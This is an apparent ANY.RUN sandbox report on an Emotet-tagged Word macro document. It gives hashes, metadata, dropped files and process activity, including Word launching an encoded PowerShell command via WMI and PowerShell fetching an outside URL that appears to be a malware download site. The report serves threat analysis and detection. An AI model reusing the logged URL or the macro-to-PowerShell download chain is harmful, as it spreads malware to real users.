File name: detail October 2019.doc
Full analysis: https://app.any.run/tasks/35fcf181-fe41-4d50-9cfa-6aabcf4deb6e
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 09, 2019, 14:45:24
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros, macros-on-open, generated-doc, emotet-doc, emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: internet solution, Subject: Research, Author: Katrina Kshlerin, Keywords: connecting, Comments: Grove, Template: Normal.dotm, Last Saved By: Norwood Crist, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 9 13:25:00 2019, Last Saved Time/Date: Wed Oct 9 13:25:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 170, Security: 0
MD5: 039F5F6B04FD35B83F946001AB990D8E
SHA1: B0B2A67537A5F773A800C835E3217DD86E223309
SHA256: 7F6971EE0DFB6D9C9078E6580036F34F7512855D580845F20BB6DD401ABEBAA3
SSDEEP: 6144:NRQ8RcVAs3MwPxTqfVIddIiIZfnUzHZBRrnfKd5:NRQ8RcD3zxTqfWMxUdbf

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS: No malicious indicators.
  • SUSPICIOUS
    • Executed via WMI: powershell.exe (PID: 2816)
    • Creates files in the user directory: powershell.exe (PID: 2816)
    • PowerShell script executed: powershell.exe (PID: 2816)
  • INFO
    • Reads Microsoft Office registry keys: WINWORD.EXE (PID: 2208)
    • Creates files in the user directory: WINWORD.EXE (PID: 2208)
    • Reads settings of System Certificates: powershell.exe (PID: 2816)
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: McKenzie
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 198
Paragraphs: 1
Lines: 1
Company: Abernathy - Paucek
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 170
Words: 29
Pages: 1
ModifyDate: 2019:10:09 12:25:00
CreateDate: 2019:10:09 12:25:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: Norwood Crist
Template: Normal.dotm
Comments: Grove
Keywords: connecting
Author: Katrina Kshlerin
Subject: Research
Title: internet solution
Total processes: 36
Monitored processes: 2
Malicious processes: 0
Suspicious processes: 1

Behavior graph

(Graph image not reproduced. Nodes shown: start, winword.exe (no specs), powershell.exe.)

Process information

PID: 2208
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\detail October 2019.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000

PID: 2816
CMD: powershell -enco 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
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wmiprvse.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Total events: 1 645
Read events: 1 127
Write events: 0
Delete events: 0

Modification events: No data

Executable files: 0
Suspicious files: 2
Text files: 2
Unknown types: 17

Dropped files

PID: 2208 (WINWORD.EXE)
Filename: C:\Users\admin\AppData\Local\Temp\CVRF34.tmp.cvr
MD5:
SHA256:

PID: 2816 (powershell.exe)
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OR63G9ZZE4BDO3NE00IM.temp
MD5:
SHA256:

PID: 2208 (WINWORD.EXE)
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3AAF1766.wmf
Type: wmf
MD5: 62E05A76F1C08101CDEA983B45528D54
SHA256: 4EB1BE5AF5136C1EC6FDD96F0FA2B6B6C8E43025E059DF2CE64EB56A7BC2D104

PID: 2208 (WINWORD.EXE)
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\detail October 2019.doc.LNK
Type: lnk
MD5: 24DE246564951AE24265C8BF71484D30
SHA256: FFEBF6F37704720A98517D2F05ECE208260283A6E75E65464054859942D2A216

PID: 2208 (WINWORD.EXE)
Filename: C:\Users\admin\Desktop\~$tail October 2019.doc
Type: pgc
MD5: 0FC672DBB465D7FF40FD13AD95FF149C
SHA256: F5895B4EB62CD0AB8CF78ACAB94FFDBB0F410B4B0B030754C8371718E2D6452E

PID: 2208 (WINWORD.EXE)
Filename: C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd
Type: tlb
MD5: 4F9DEBFF059DB042870AE63481384E8F
SHA256: BA4A6EF654E43F16682BD2A2781CF336348004F20BC651A480C5DBC94799765D

PID: 2208 (WINWORD.EXE)
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\72CD42F.wmf
Type: wmf
MD5: 33DFCEC792D9232CE59258BD191C9B1A
SHA256: 6E7ECB823C4E63D6DDD42095FA3E9E23F6315F16A7A318794605EFD5C7764827

PID: 2208 (WINWORD.EXE)
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5A106598.wmf
Type: wmf
MD5: E7BCF1734133420ABDF3AB79AFC7252A
SHA256: 23733A2BA03EB1B6DEB124593D212D26578A665442E330DA3C25867D6E8F7F98

PID: 2208 (WINWORD.EXE)
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Type: pgc
MD5: 7345FE340B620F1C29D150528EED59C9
SHA256: 708F5C60BDB95470BD6DD9E62A46E401C271CDBB397327F92270D2004D450B74

PID: 2816 (powershell.exe)
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Type: binary
MD5: 57F2BEBD8AB4D14DFF05F8F1EE1B1091
SHA256: 24089794FD7207234A86BFD7344771ABD7A0BC15DCEB1A256EF927F010B65B1F
HTTP(S) requests: 1
TCP/UDP connections: 2
DNS requests: 2
Threats: 0

HTTP requests

PID: 2816 (powershell.exe)
Method: GET
HTTP Code: 301
IP: 104.31.80.168:80
URL: http://www.firstepc.co.uk/partnerzy/qpmu-x6apdv-47372/
CN: US
Reputation: unknown

Connections

PID: 2816 (powershell.exe)
IP: 104.31.80.168:443
Domain: www.firstepc.co.uk
ASN: Cloudflare Inc
CN: US
Reputation: unknown

PID: 2816 (powershell.exe)
IP: 104.31.80.168:80
Domain: www.firstepc.co.uk
ASN: Cloudflare Inc
CN: US
Reputation: unknown

DNS requests

Domain: www.firstepc.co.uk
IP:
  • 104.31.80.168
  • 104.31.81.168
Reputation: unknown

Threats

No threats detected
No debug info